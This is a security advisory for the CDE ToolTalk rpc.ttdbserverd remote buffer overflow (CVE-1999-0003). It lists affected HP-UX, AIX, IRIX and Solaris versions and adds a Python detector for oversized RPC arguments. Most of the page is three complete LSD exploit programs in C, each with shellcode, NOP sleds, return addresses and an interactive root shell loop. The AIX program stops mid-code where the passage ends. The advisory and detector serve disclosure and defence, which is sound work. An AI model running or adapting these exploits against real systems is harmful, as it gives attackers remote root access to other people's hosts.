Multiple Vendor CDE ToolTalk Database Server rpc.ttdbserverd Remote Buffer Overflow Vulnerability
Published: 1998-08-31
Updated: 2002-05-20
Affected systems:
Multiple Vendor rpc.ttdbserverd
- HP HP-UX 11.0
- HP HP-UX 10.30
- HP HP-UX 10.20
- HP HP-UX 10.10
- IBM AIX 4.3
- IBM AIX 4.2.1
- IBM AIX 4.2
- IBM AIX 4.1.5
- IBM AIX 4.1.4
- IBM AIX 4.1.3
- IBM AIX 4.1.2
- IBM AIX 4.1.1
- IBM AIX 4.1
- SGI IRIX 6.4
- SGI IRIX 6.3
- SGI IRIX 6.2
- SGI IRIX 6.1
- SGI IRIX 6.0.1XFS
- SGI IRIX 6.0.1
- SGI IRIX 6.0
- SGI IRIX 5.3XFS
- SGI IRIX 5.3
- SGI IRIX 5.2
- Sun Solaris 2.6
- Sun Solaris 2.5.1 x86
- Sun Solaris 2.5.1
- Sun Solaris 2.5
- Sun Solaris 2.4 x86
- Sun Solaris 2.4
- Sun Solaris 2.3
- Sun Solaris 2.2
- Sun Solaris 2.1
- Sun Solaris 2.0
- Sun Solaris 1.2
- Sun Solaris 1.1.4
- Sun Solaris 1.1.3
- Sun Solaris 1.1.2
- Sun Solaris 1.1.1
- Sun Solaris 1.1
Unaffected systems:
Multiple Vendor rpc.ttdbserverd
- SGI IRIX 6.5.9m
- SGI IRIX 6.5.9f
- SGI IRIX 6.5.9
- SGI IRIX 6.5.8m
- SGI IRIX 6.5.8f
- SGI IRIX 6.5.8
- SGI IRIX 6.5.7m
- SGI IRIX 6.5.7f
- SGI IRIX 6.5.7
- SGI IRIX 6.5.6m
- SGI IRIX 6.5.6f
- SGI IRIX 6.5.6
- SGI IRIX 6.5.5m
- SGI IRIX 6.5.5f
- SGI IRIX 6.5.5
- SGI IRIX 6.5.4m
- SGI IRIX 6.5.4f
- SGI IRIX 6.5.4
- SGI IRIX 6.5.3m
- SGI IRIX 6.5.3f
- SGI IRIX 6.5.3
- SGI IRIX 6.5.14m
- SGI IRIX 6.5.14f
- SGI IRIX 6.5.14
- SGI IRIX 6.5.13m
- SGI IRIX 6.5.13f
- SGI IRIX 6.5.13
- SGI IRIX 6.5.12m
- SGI IRIX 6.5.12f
- SGI IRIX 6.5.12
- SGI IRIX 6.5.11m
- SGI IRIX 6.5.11f
- SGI IRIX 6.5.11
- SGI IRIX 6.5.10m
- SGI IRIX 6.5.10f
- SGI IRIX 6.5.10
Description:
BUGTRAQ ID: 122
CVE(CAN) ID: CVE-1999-0003
The Common Desktop Environment (CDE) is an integrated graphical user interface that runs on many UNIX and Linux operating systems. The CDE ToolTalk service lets independently developed applications communicate with each other by exchanging ToolTalk messages across hosts and platforms. Using ToolTalk, applications can define open protocols that allow programs to be swapped and new programs to be plugged into the system with as little reconfiguration as possible. The ToolTalk RPC database server, rpc.ttdbserverd, manages ToolTalk application communication. Many Unix vendors install CDE by default.
An implementation error in the ToolTalk database server lets a remote attacker run arbitrary commands with superuser privileges on any host that runs the ToolTalk service.
Because of this implementation error, a malicious RPC message sent by a remote client can overflow a heap variable in the ToolTalk database server and execute arbitrary instructions carried in that message, yielding root privileges on the host.
<*Links: http://online.securityfocus.com/advisories/281
http://marc.theaimsgroup.com/?l=bugtraq&m=90461590528287&w=2
http://www.cert.org/advisories/CA-1998-11.html
ftp://patches.sgi.com/support/free/security/advisories/19981101-01-P
ftp://patches.sgi.com/support/free/security/advisories/20020302-01-A
*>
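The overflow is delivered as an ordinary ONC RPC call to program 100083, version 1, procedure 7 (the numbers the test programs below use as TTDBSERVERD_PROG, TTDBSERVERD_VERS and TTDBSERVERD_ISERASE) whose single xdr_string argument is far longer than any file path. A network sensor can therefore flag the attack from the RPC header and the XDR string length alone. The following detector is an added example and is not part of the NSFOCUS advisory or of LSD's code; the 1024-byte limit, the function names and the sample records are assumptions constructed for illustration, and only single-fragment TCP records are handled.

```python
"""Flag oversized rpc.ttdbserverd calls in a captured TCP byte stream.

Added example, not part of the advisory or LSD's test programs.  Program,
version and procedure numbers (100083 / 1 / 7) and the xdr_string argument
come from the advisory; the 1024-byte limit and the sample records are
constructed.  Only single-fragment RPC records are handled.
"""
import struct

TTDBSERVERD_PROG = 100083
TTDBSERVERD_VERS = 1
TTDBSERVERD_ISERASE = 7
RPC_CALL = 0                 # msg_type of an RPC call
MAX_SANE_PATH = 1024         # assumption: a genuine path argument fits in PATH_MAX


def build_call(prog, vers, proc, arg, xid=0x1234):
    """Build one ONC RPC call record over TCP (record marking, AUTH_NULL
    credentials, a single xdr_string argument).  Used only to construct
    sample input for the detector."""
    data = arg.encode()
    padded = data + b"\0" * (-len(data) % 4)          # XDR pads opaque data to 4 bytes
    body = struct.pack(">IIIIII", xid, RPC_CALL, 2, prog, vers, proc)
    body += struct.pack(">IIII", 0, 0, 0, 0)         # cred and verf: AUTH_NULL, zero length
    body += struct.pack(">I", len(data)) + padded    # xdr_string: length, then bytes
    return struct.pack(">I", 0x80000000 | len(body)) + body   # last-fragment bit + length


def parse_calls(stream):
    """Yield header fields and argument length for every complete CALL record."""
    off = 0
    while off + 4 <= len(stream):
        mark, = struct.unpack_from(">I", stream, off)
        frag_len = mark & 0x7FFFFFFF
        rec = stream[off + 4:off + 4 + frag_len]
        off += 4 + frag_len
        if len(rec) < frag_len or len(rec) < 40:
            continue                                 # truncated record or too short to carry a call
        xid, mtype, rpcvers, prog, vers, proc = struct.unpack_from(">IIIIII", rec, 0)
        if mtype != RPC_CALL or rpcvers != 2:
            continue
        pos = 24
        for _ in range(2):                           # skip cred and verf (opaque_auth)
            if pos + 8 > len(rec):
                pos = None
                break
            _flavor, alen = struct.unpack_from(">II", rec, pos)
            pos += 8 + alen + (-alen % 4)
        if pos is None or pos + 4 > len(rec):
            continue
        arg_len, = struct.unpack_from(">I", rec, pos)
        yield {"xid": xid, "prog": prog, "vers": vers, "proc": proc, "arg_len": arg_len}


def find_overflow_attempts(stream, limit=MAX_SANE_PATH):
    """Return the ttdbserverd ISERASE calls whose string argument is longer
    than any legitimate path could be."""
    return [c for c in parse_calls(stream)
            if c["prog"] == TTDBSERVERD_PROG
            and c["proc"] == TTDBSERVERD_ISERASE
            and c["arg_len"] > limit]


if __name__ == "__main__":
    # Constructed sample stream: one ordinary call, then one with a 5000-byte argument.
    sample = build_call(TTDBSERVERD_PROG, TTDBSERVERD_VERS, TTDBSERVERD_ISERASE, "/tmp/file")
    sample += build_call(TTDBSERVERD_PROG, TTDBSERVERD_VERS, TTDBSERVERD_ISERASE, "A" * 5000)
    for hit in find_overflow_attempts(sample):
        print("ALERT xid=0x%x prog=%d proc=%d arg_len=%d"
              % (hit["xid"], hit["prog"], hit["proc"], hit["arg_len"]))
```

The check keys on the argument length rather than on any byte pattern, so it is not defeated by a different payload or NOP sled; the cost is that the record must be reassembled from the TCP stream first, which is what any RPC-aware IDS preprocessor does before applying such a rule.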
Test method:
Warning
The following programs (methods) may be offensive in nature and are provided for security research and teaching only. Users bear the risk themselves!
/*## copyright LAST STAGE OF DELIRIUM jul 1998 poland *://lsd-pl.net/ #*/
/*## rpc.ttdbserverd #*/
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <rpc/rpc.h>
#include <netdb.h>
#include <stdio.h>
#include <errno.h>
int adrnum;
int nopnum;
#define TTDBSERVERD_PROG 100083
#define TTDBSERVERD_VERS 1
#define TTDBSERVERD_ISERASE 7
char findsckcode[]=
"\x20\xbf\xff\xff" /* bn,a <findsckcode-4> */
"\x20\xbf\xff\xff" /* bn,a <findsckcode> */
"\x7f\xff\xff\xff" /* call <findsckcode+4> */
"\xa0\x20\x3f\xff" /* sub %g0,-1,%l0 */
"\xa4\x03\xff\xd0" /* add %o7,-48,%l2 */
"\xa6\x10\x20\x44" /* mov 0x44,%l3 */
"\xa8\x10\x23\xff" /* mov 0x3ff,%l4 */
"\xaa\x03\xe0\x44" /* add %o7,68,%l5 */
"\x81\xc5\x60\x08" /* jmp %l5+8 */
"\xaa\x10\x20\xff" /* mov 0xff,%l5 */
"\xab\x2d\x60\x08" /* sll %l5,8,%l5 */
"\xaa\x15\x60\xff" /* or %l5,0xff,%l5 */
"\xe2\x03\xff\xd0" /* ld [%o7-48],%l1 */
"\xac\x0c\x40\x15" /* and %l1,%l5,%l6 */
"\x2b\x00\x00\x00" /* sethi %hi(0x00000000),%l5 */
"\xaa\x15\x60\x00" /* or %l5,0x000,%l5 */
"\xac\x05\x40\x16" /* add %l5,%l6,%l6 */
"\xac\x05\xbf\xff" /* add %l6,-1,%l6 */
"\x80\xa5\xbf\xff" /* cmp %l6,-1 */
"\x02\xbf\xff\xf5" /* be <findsckcode+32> */
"\xaa\x03\xe0\x7c" /* add %o7,0x7c,%l5 */
"\xe6\x23\xff\xc4" /* st %l3,[%o7-60] */
"\xc0\x23\xff\xc8" /* st %g0,[%o7-56] */
"\xe4\x23\xff\xcc" /* st %l2,[%o7-52] */
"\x90\x04\x3f\xff" /* add %l0,-1,%o0 */
"\xaa\x10\x20\x54" /* mov 0x54,%l5 */
"\xad\x2d\x60\x08" /* sll %l5,8,%l6 */
"\x92\x15\xa0\x91" /* or %l6,0x91,%o1 */
"\x94\x03\xff\xc4" /* add %o7,-60,%o2 */
"\x82\x10\x20\x36" /* mov 0x36,%g1 */
"\x91\xd0\x20\x08" /* ta 8 */
"\xa0\x24\x3f\xff" /* sub %l0,-1,%l0 */
"\x1a\xbf\xff\xe9" /* bcc <findsckcode+36> */
"\x80\xa4\x23\xff" /* cmp %l0,0x3ff */
"\x04\xbf\xff\xf3" /* bl <findsckcode+84> */
"\xaa\x20\x3f\xff" /* sub %g0,-1,%l5 */
"\x90\x05\x7f\xff" /* add %l5,-1,%o0 */
"\x82\x10\x20\x06" /* mov 0x6,%g1 */
"\x91\xd0\x20\x08" /* ta 8 */
"\x90\x04\x3f\xfe" /* add %l0,-2,%o0 */
"\x82\x10\x20\x29" /* mov 0x29,%g1 */
"\x91\xd0\x20\x08" /* ta 8 */
"\xaa\x25\x7f\xff" /* sub %l5,-1,%l5 */
"\x80\xa5\x60\x03" /* cmp %l5,3 */
"\x04\xbf\xff\xf8" /* ble <findsckcode+144> */
"\x80\x1c\x40\x11" /* xor %l1,%l1,%g0 */
;
char shellcode[]=
"\x20\xbf\xff\xff" /* bn,a <shellcode-4> */
"\x20\xbf\xff\xff" /* bn,a <shellcode> */
"\x7f\xff\xff\xff" /* call <shellcode+4> */
"\x90\x03\xe0\x20" /* add %o7,32,%o0 */
"\x92\x02\x20\x10" /* add %o0,16,%o1 */
"\xc0\x22\x20\x08" /* st %g0,[%o0+8] */
"\xd0\x22\x20\x10" /* st %o0,[%o0+16] */
"\xc0\x22\x20\x14" /* st %g0,[%o0+20] */
"\x82\x10\x20\x0b" /* mov 0xb,%g1 */
"\x91\xd0\x20\x08" /* ta 8 */
"/bin/ksh"
;
char cmdshellcode[]=
"\x20\xbf\xff\xff" /* bn,a <cmdshellcode-4> */
"\x20\xbf\xff\xff" /* bn,a <cmdshellcode> */
"\x7f\xff\xff\xff" /* call <cmdshellcode+4> */
"\x90\x03\xe0\x34" /* add %o7,52,%o0 */
"\x92\x23\xe0\x20" /* sub %o7,32,%o1 */
"\xa2\x02\x20\x0c" /* add %o0,12,%l1 */
"\xa4\x02\x20\x10" /* add %o0,16,%l2 */
"\xc0\x2a\x20\x08" /* stb %g0,[%o0+8] */
"\xc0\x2a\x20\x0e" /* stb %g0,[%o0+14] */
"\xd0\x23\xff\xe0" /* st %o0,[%o7-32] */
"\xe2\x23\xff\xe4" /* st %l1,[%o7-28] */
"\xe4\x23\xff\xe8" /* st %l2,[%o7-24] */
"\xc0\x23\xff\xec" /* st %g0,[%o7-20] */
"\x82\x10\x20\x0b" /* mov 0xb,%g1 */
"\x91\xd0\x20\x08" /* ta 8 */
"/bin/ksh -c "
;
static char nop[]="\x80\x1c\x40\x11";
typedef struct{char *string;}req_t;
bool_t xdr_req(XDR *xdrs,req_t *obj){
if(!xdr_string(xdrs,&obj->string,~0)) return(FALSE);
return(TRUE);
}
main(int argc,char **argv){
char buffer[30000],address[4],*b,*cmd;
int i,c,n,flag=1,vers=0,port=0,sck;
CLIENT *cl;enum clnt_stat stat;
struct hostent *hp;
struct sockaddr_in adr;
struct timeval tm={10,0};
req_t req;
printf("copyright LAST STAGE OF DELIRIUM jul 1998 poland //lsd-pl.net/\n");
printf("rpc.ttdbserverd for solaris 2.3 2.4 2.5 2.5.1 2.6 sparc\n\n");
if(argc<2){
printf("usage: %s address [-s|-c command] [-p port] [-v 6]\n",argv[0]);
exit(-1);
}
while((c=getopt(argc-1,&argv[1],"sc:p:v:"))!=-1){
switch(c){
case 's': flag=1;break;
case 'c': flag=0;cmd=optarg;break;
case 'p': port=atoi(optarg);break;
case 'v': vers=atoi(optarg);
}
}
if(vers==6){
*(unsigned long*)address=htonl(0xeffff420+1200+552);
adrnum=1200;
nopnum=1300;
}else{
*(unsigned long*)address=htonl(0xefffdadc+1000+4500);
adrnum=3000;
nopnum=6000;
}
printf("adr=0x%08x timeout=%d ",ntohl(*(unsigned long*)address),tm.tv_sec);
fflush(stdout);
adr.sin_family=AF_INET;
adr.sin_port=htons(port);
if((adr.sin_addr.s_addr=inet_addr(argv[1]))==-1){
if((hp=gethostbyname(argv[1]))==NULL){
errno=EADDRNOTAVAIL;perror("error");exit(-1);
}
memcpy(&adr.sin_addr.s_addr,hp->h_addr,4);
}
sck=RPC_ANYSOCK;
if(!(cl=clnttcp_create(&adr,TTDBSERVERD_PROG,TTDBSERVERD_VERS,&sck,0,0))){
clnt_pcreateerror("error");exit(-1);
}
cl->cl_auth=authunix_create("localhost",0,0,0,NULL);
b=buffer;
for(i=0;i<adrnum;i++) *b++=address[i%4];
for(i=0;i<nopnum;i++) *b++=nop[i%4];
if(flag){
i=sizeof(struct sockaddr_in);
if(getsockname(sck,(struct sockaddr*)&adr,&i)==-1){
struct{unsigned int maxlen;unsigned int len;char *buf;}nb;
ioctl(sck,(('S'<<8)|2),"sockmod");
nb.maxlen=0xffff;
nb.len=sizeof(struct sockaddr_in);;
nb.buf=(char*)&adr;
ioctl(sck,(('T'<<8)|144),&nb);
}
n=-ntohs(adr.sin_port);
printf("port=%d connected! ",-n);fflush(stdout);
*((unsigned long*)(&findsckcode[56]))|=htonl((n>>10)&0x3fffff);
*((unsigned long*)(&findsckcode[60]))|=htonl(n&0x3ff);
for(i=0;i<strlen(findsckcode);i++) *b++=findsckcode[i];
for(i=0;i<strlen(shellcode);i++) *b++=shellcode[i];
}else{
for(i=0;i<strlen(cmdshellcode);i++) *b++=cmdshellcode[i];
for(i=0;i<strlen(cmd);i++) *b++=cmd[i];
*b++=';';
}
*b++=':';
*b=0;
req.string=buffer;
stat=clnt_call(cl,TTDBSERVERD_ISERASE,xdr_req,&req,xdr_void,NULL,tm);
if(stat==RPC_SUCCESS) {printf("\nerror: not vulnerable\n");exit(-1);}
printf("sent!\n");if(!flag) exit(0);
write(sck,"/bin/uname -a\n",14);
while(1){
fd_set fds;
FD_ZERO(&fds);
FD_SET(0,&fds);
FD_SET(sck,&fds);
if(select(FD_SETSIZE,&fds,NULL,NULL,NULL)){
int cnt;
char buf[1024];
if(FD_ISSET(0,&fds)){
if((cnt=read(0,buf,1024))<1){
if(errno==EWOULDBLOCK||errno==EAGAIN) continue;
else break;
}
write(sck,buf,cnt);
}
if(FD_ISSET(sck,&fds)){
if((cnt=read(sck,buf,1024))<1){
if(errno==EWOULDBLOCK||errno==EAGAIN) continue;
else break;
}
write(1,buf,cnt);
}
}
}
}
LSD (contact@lsd-pl.net) provided the following test program:
/*## copyright LAST STAGE OF DELIRIUM jul 1998 poland *://lsd-pl.net/ #*/
/*## rpc.ttdbserverd #*/
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <rpc/rpc.h>
#include <netdb.h>
#include <stdio.h>
#include <errno.h>
#define ADRNUM 2000
#define NOPNUM 18000
#define TTDBSERVERD_PROG 100083
#define TTDBSERVERD_VERS 1
#define TTDBSERVERD_ISERASE 7
char findsckcode[]=
"\x04\x10\xff\xff" /* bltzal $zero,<findsckcode> */
"\x24\x10\x01\x90" /* li $s0,400 */
"\x22\x11\xff\xb0" /* addi $s1,$s0,-80 */
"\x22\x12\xff\xac" /* addi $s2,$s0,-84 */
"\x22\x0d\xfe\x98" /* addi $t5,$s0,-360 */
"\x03\xed\x68\x20" /* add $t5,$ra,$t5 */
"\x01\xa0\xf0\x09" /* jalr $s8,$t5 */
"\x8f\xeb\xff\xc0" /* lw $t3,-64($ra) */
"\x31\x6b\xff\xff" /* andi $t3,$t3,0xffff */
"\x21\x6b\x00\x00" /* addi $t3,$t3,0 */
"\x22\x0d\xfe\xc0" /* addi $t5,$s0,-320 */
"\x11\x60\xff\xf9" /* beqz $t3,<findsckcode+20> */
"\x22\x24\xfe\xd4" /* addi $a0,$s1,-300 */
"\x23\xe5\xff\xc0" /* addi $a1,$ra,-64 */
"\x23\xe6\xff\xbc" /* addi $a2,$ra,-68 */
"\xaf\xf2\xff\xbc" /* sw $s2,-68($ra) */
"\x24\x02\x04\x45" /* li $v0,1093 */
"\x03\xff\xff\xcc" /* syscall */
"\x22\x31\xff\xff" /* addi $s1,$s1,-1 */
"\x10\xe0\xff\xf3" /* beqz $a3,<findsckcode+28> */
"\x22\x2b\xfe\xd4" /* addi $t3,$s1,-300 */
"\x1d\x60\xff\xf6" /* bgzt $t3,<findsckcode+48> */
"\x22\x04\xfe\x72" /* addi $a0,$s0,-398 */
"\x24\x02\x03\xee" /* li $v0,1006 */
"\x03\xff\xff\xcc" /* syscall */
"\x22\x24\xfe\xd5" /* addi $a0,$s1,-299 */
"\x22\x05\xfe\x72" /* addi $a1,$s0,-398 */
"\x24\x02\x04\x11" /* li $v0,1041 */
"\x03\xff\xff\xcc" /* syscall */
"\x22\x10\xff\xff" /* addi $s0,$s0,-1 */
"\x22\x0b\xfe\x72" /* addi $t3,$s0,-398 */
"\x05\x61\xff\xf6" /* bgez $t3,<findsckcode+88> */
;
char shellcode[]=
"\x04\x10\xff\xff" /* bltzal $zero,<shellcode> */
"\x24\x02\x03\xf3" /* li $v0,1011 */
"\x23\xff\x01\x14" /* addi $ra,$ra,276 */
"\x23\xe4\xff\x08" /* addi $a0,$ra,-248 */
"\x23\xe5\xff\x10" /* addi $a1,$ra,-220 */
"\xaf\xe4\xff\x10" /* sw $a0,-220($ra) */
"\xaf\xe0\xff\x14" /* sw $zero,-236($ra) */
"\xa3\xe0\xff\x0f" /* sb $zero,-241($ra) */
"\x03\xff\xff\xcc" /* syscall */
"/bin/sh"
;
char cmdshellcode[]=
"\x04\x10\xff\xff" /* bltzal $zero,<cmdshellcode> */
"\x24\x02\x03\xf3" /* li $v0,1011 */
"\x23\xff\x08\xf4" /* addi $ra,$ra,2292 */
"\x23\xe4\xf7\x40" /* addi $a0,$ra,-2240 */
"\x23\xe5\xfb\x24" /* addi $a1,$ra,-1244 */
"\xaf\xe4\xfb\x24" /* sw $a0,-1244($ra) */
"\x23\xe6\xf7\x48" /* addi $a2,$ra,-2232 */
"\xaf\xe6\xfb\x28" /* sw $a2,-1240($ra) */
"\x23\xe6\xf7\x4c" /* addi $a2,$ra,-2228 */
"\xaf\xe6\xfb\x2c" /* sw $a2,-1236($ra) */
"\xaf\xe0\xfb\x30" /* sw $zero,-1232($ra) */
"\xa3\xe0\xf7\x47" /* sb $zero,-2233($ra) */
"\xa3\xe0\xf7\x4a" /* sb $zero,-2230($ra) */
"\x02\x04\x8d\x0c" /* syscall */
"\x01\x08\x40\x25" /* or $t0,$t0,$t0 */
"/bin/sh -c "
;
static char nop[]="\x24\x0f\x12\x34";
typedef struct{char *string;}req_t;
bool_t xdr_req(XDR *xdrs,req_t *obj){
if(!xdr_string(xdrs,&obj->string,~0)) return(FALSE);
return(TRUE);
}
main(int argc,char **argv){
char buffer[30000],address[4],*b,*cmd;
int i,c,n,flag=1,vers=6,port=0,sck;
CLIENT *cl;enum clnt_stat stat;
struct hostent *hp;
struct sockaddr_in adr;
struct timeval tm={10,0};
req_t req;
printf("copyright LAST STAGE OF DELIRIUM jul 1998 poland //lsd-pl.net/\n");
printf("rpc.ttdbserverd for irix 5.2 5.3 6.2 6.3 6.4 6.5 6.5.2 ");
printf("IP:17,19-22,25-28,30,32\n\n");
if(argc<2){
printf("usage: %s address [-s|-c command] [-p port] [-v 5]\n",argv[0]);
exit(-1);
}
while((c=getopt(argc-1,&argv[1],"sc:p:v:"))!=-1){
switch(c){
case 's': flag=1;break;
case 'c': flag=0;cmd=optarg;break;
case 'p': port=atoi(optarg);break;
case 'v': vers=atoi(optarg);
}
}
if(vers==5) *(unsigned long*)address=htonl(0x7fff24f4+2000+9000+32700);
else *(unsigned long*)address=htonl(0x7fff24f4+2000+9000);
printf("adr=0x%08x timeout=%d ",ntohl(*(unsigned long*)address),tm.tv_sec);
fflush(stdout);
adr.sin_family=AF_INET;
adr.sin_port=htons(port);
if((adr.sin_addr.s_addr=inet_addr(argv[1]))==-1){
if((hp=gethostbyname(argv[1]))==NULL){
errno=EADDRNOTAVAIL;perror("error");exit(-1);
}
memcpy(&adr.sin_addr.s_addr,hp->h_addr,4);
}
sck=RPC_ANYSOCK;
if(!(cl=clnttcp_create(&adr,TTDBSERVERD_PROG,TTDBSERVERD_VERS,&sck,0,0))){
clnt_pcreateerror("error");exit(-1);
}
b=buffer;
for(i=0;i<ADRNUM;i++) *b++=address[i%4];
for(i=0;i<NOPNUM;i++) *b++=nop[i%4];
if(flag){
i=sizeof(struct sockaddr_in);
if(getsockname(sck,(struct sockaddr*)&adr,&i)==-1){
struct netbuf {unsigned int maxlen;unsigned int len;char *buf;};
struct netbuf nb;
ioctl(sck,(('S'<<8)|2),"sockmod");
nb.maxlen=0xffff;
nb.len=sizeof(struct sockaddr_in);;
nb.buf=(char*)&adr;
ioctl(sck,(('T'<<8)|144),&nb);
}
n=-ntohs(adr.sin_port);
printf("port=%d connected! ",-n);fflush(stdout);
findsckcode[36+2]=(unsigned char)((n&0xff00)>>8);
findsckcode[36+3]=(unsigned char)(n&0xff);
for(i=0;i<strlen(findsckcode);i++) *b++=findsckcode[i];
for(i=0;i<4;i++) *b++=nop[i%4];
for(i=0;i<strlen(shellcode);i++) *b++=shellcode[i];
}else{
printf("connected! ");fflush(stdout);
for(i=0;i<strlen(cmdshellcode);i++) *b++=cmdshellcode[i];
for(i=0;i<4;i++) *b++=' ';
for(i=0;i<strlen(cmd);i++) *b++=cmd[i];
}
*b++=':';
*b=0;
req.string=buffer;
cl->cl_auth=authunix_create("localhost",0,0,0,NULL);
stat=clnt_call(cl,TTDBSERVERD_ISERASE,xdr_req,&req,xdr_void,NULL,tm);
printf("sent!\n");
if(!flag) exit(0);
write(sck,"/bin/uname -a\n",14);
while(1){
fd_set fds;
FD_ZERO(&fds);
FD_SET(0,&fds);
FD_SET(sck,&fds);
if(select(FD_SETSIZE,&fds,NULL,NULL,NULL)){
int cnt;
char buf[1024];
if(FD_ISSET(0,&fds)){
if((cnt=read(0,buf,1024))<1){
if(errno==EWOULDBLOCK||errno==EAGAIN) continue;
else break;
}
write(sck,buf,cnt);
}
if(FD_ISSET(sck,&fds)){
if((cnt=read(sck,buf,1024))<1){
if(errno==EWOULDBLOCK||errno==EAGAIN) continue;
else break;
}
write(1,buf,cnt);
}
}
}
}
LSD (contact@lsd-pl.net) provided the following test program:
/*## copyright LAST STAGE OF DELIRIUM jul 1998 poland *://lsd-pl.net/ #*/
/*## rpc.ttdbserver #*/
/* note: to avoid potential system hang-up please, first obtain the exact */
/* AIX OS level with the use of some OS fingerprinting method */
/* due to the "end of page copy" and cache problems we got very little */
/* space for the nops buffer. this is why an additional offset might be */
/* required to be specified in order to exploit this vulnerability. */
/* for offsets use the [+-]n*600 values: 0,-600,600,-1200,1200,-1800,.. */
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <rpc/rpc.h>
#include <netdb.h>
#include <stdio.h>
#include <errno.h>
#define ADRNUM 3000
#define NOPNUM 740
#define TTDBSERVERD_PROG 100083
#define TTDBSERVERD_VERS 1
#define TTDBSERVERD_ISERASE 7
#define SCAIX41 "\x03\x68\x41\x5e\x6d\x7f\x6f\xd6\x57\x56\x55\x53"
#define SCAIX42 "\x02\x71\x46\x62\x76\x8e\x78\xe7\x5b\x5a\x59\x58"
char syscallcode[]=
"\x7e\x94\xa2\x79" /* xor. r20,r20,r20 */
"\x40\x82\xff\xfd" /* bnel <syscallcode> */
"\x7e\xa8\x02\xa6" /* mflr r21 */
"\x3a\xc0\x01\xff" /* lil r22,0x1ff */
"\x3a\xf6\xfe\x2d" /* cal r23,-467(r22) */
"\x7e\xb5\xba\x14" /* cax r21,r21,r23 */
"\x7e\xa9\x03\xa6" /* mtctr r21 */
"\x4e\x80\x04\x20" /* bctr */
"\xff\xff\xff\xff"
"\xff\xff\xff\xff"
"\xff\xff\xff\xff"
"\x4c\xc6\x33\x42" /* crorc cr6,cr6,cr6 */
"\x44\xff\xff\x02" /* svca 0x0 */
"\x3a\xb5\xff\xf8" /* cal r21,-8(r21) */
;
char findsckcode[]=
"\x2c\x74\x12\x34" /* cmpi cr0,r20,0x1234 */
"\x41\x82\xff\xfd" /* beql <findsckcode> */
"\x7f\x08\x02\xa6" /* mflr r24 */
"\x3b\x36\xfe\x2d" /* cal r25,-467(r22) */
"\x3b\x40\x01\x01" /* lil r26,0x16 */
"\x7f\x78\xca\x14" /* cax r27,r24,r25 */
"\x7f\x69\x03\xa6" /* mtctr r27 */
"\x4e\x80\x04\x20" /* bctr */
"\xa3\x78\xff\xfe" /* lhz r27,-2(r24) */
"\xa3\x98\xff\xfa" /* lhz r28,-6(r24) */
"\x7c\x1b\xe0\x40" /* cmpl cr0,r27,r28 */
"\x3b\x36\xfe\x59" /* cal r25,-423(r22) */
"\x41\x82\xff\xe4" /* beq <findsckcode+20> */
"\x7f\x43\xd3\x78" /* mr r3,r26 */
"\x38\x98\xff\xfc" /* cal r4,-4(r24) */
"\x38\xb8\xff\xf4" /* cal r5,-12(r24) */
"\x93\x38\xff\xf4" /* st r25,-12(r24) */
"\x88\x55\xff\xf6" /* lbz r2,-10(r21) */
"\x7e\xa9\x03\xa6" /* mtctr r21 */
"\x4e\x80\x04\x21" /* bctrl */
"\x37\x5a\xff\xff" /* ai. r26,r26,-1 */
"\x2d\x03\xff\xff" /* cmpi cr2,r3,-1 */
"\x40\x8a\xff\xc8" /* bne cr2,<findsckcode+32> */
"\x40\x82\xff\xd8" /* bne <findsckcode+48> */
"\x3b\x36\xfe\x03" /* cal r25,-509(r22) */
"\x3b\x76\xfe\x02" /* cal r27,-510(r22) */
"\x7f\x23\xcb\x78" /* mr r3,r25 */
"\x88\x55\xff\xf7" /* lbz r2,-9(r21) */
"\x7e\xa9\x03\xa6" /* mtctr r21 */
"\x4e\x80\x04\x21" /* bctrl */
"\x7c\x7a\xda\x14" /* cax r3,r26,r27 */
"\x7e\x84\xa3\x78" /* mr r4,r20 */
"\x7f\x25\xcb\x78" /* mr r5,r25 */
"\x88\x55\xff\xfb" /* lbz r2,-5(r21) */
"\x7e\xa9\x03\xa6" /* mtctr r21 */
"\x4e\x80\x04\x21" /* bctrl */
"\x37\x39\xff\xff" /* ai. r25,r25,-1 */
"\x40\x80\xff\xd4" /* bge <findsckcode+100> */
;
char shellcode[]=
"\x7c\xa5\x2a\x79" /* xor. r5,r5,r5 */
"\x40\x82\xff\xfd" /* bnel <shellcode> */
"\x7f\xe8\x02\xa6" /* mflr r31 */
"\x3b\xff\x01\x20" /* cal r31,0x120(r31) */
"\x38\x7f\xff\x08" /* cal r3,-248(r31) */
"\x38\x9f\xff\x10" /* cal r4,-240(r31) */
"\x90\x7f\xff\x10" /* st r3,-240(r31) */
"\x90\xbf\xff\x14" /* st r5,-236(r31) */
"\x88\x55\xff\xf4" /* lbz r2,-12(r21) */
"\x98\xbf\xff\x0f" /* stb r5,-241(r31) */
"\x7e\xa9\x03\xa6" /* mtctr r21 */
"\x4e\x80\x04\x20" /* bctr */
"/bin/sh"
;
char nop[]="\x3a\xc0\x01\x90";
typedef struct{char *string;}req_t;
bool_t xdr_req(XDR *xdrs,req_t *obj){
if(!xdr_string(xdrs,&obj->string,~0)) return(FALSE);
return(TRUE);
}
main(int argc,char **argv){
char buffer[30000],address[4],*b;
int i,c,n,vers=-1,port=0,ofs=0,sck;
CLIENT *cl;enum clnt_stat stat;
struct hostent *hp;
struct sockaddr_in adr;
struct timeval tm={10,0};
req_t req;
printf("copyright LAST STAGE OF DELIRIUM jul 1998 poland //lsd-pl.net/\n");
printf("rpc.ttdbserver for aix 4.1 4.2\n\n");
if(argc<2){
printf("usage: %s address [-p port] [-o ofs] -v [41|42]\n",argv[0]);
exit(-1);
}
while((c=getopt(argc-1,&argv[1],"p:v:o:"))!=-1){
switch(c){
case 'p': port=atoi(optarg); break;
case 'v': vers=atoi(optarg); break;
case 'o': ofs=atoi(optarg);
}
}
if(vers==-1) exit(-1);
if(vers==41){
*(unsigned long*)address=0x2002fa0c+300+ofs;
memcpy(&syscallcode[32],SCAIX41,12);
}
if(vers==42){
memcpy(&syscallcode[32],SCAIX42,12);
*(unsigned long*)address=0x2002f250+300+ofs;
}
printf("adr=0x%08x timeout=%d ",ntohl(*(unsigned long*)address),tm.tv_sec);
fflush(stdout);
adr.sin_family=AF_INET;
adr.sin_port=htons(port);
if((adr.sin_addr.s_addr=inet_addr(argv[1]))==-1){
if((hp=gethostbyname(argv[1]))==NULL){
errno=EADDRNOTAVAIL;perror("error");exit(-1);
}
memcpy(&adr.sin_addr.s_addr,hp->h_addr,4);
}
sck=RPC_ANYSOCK;
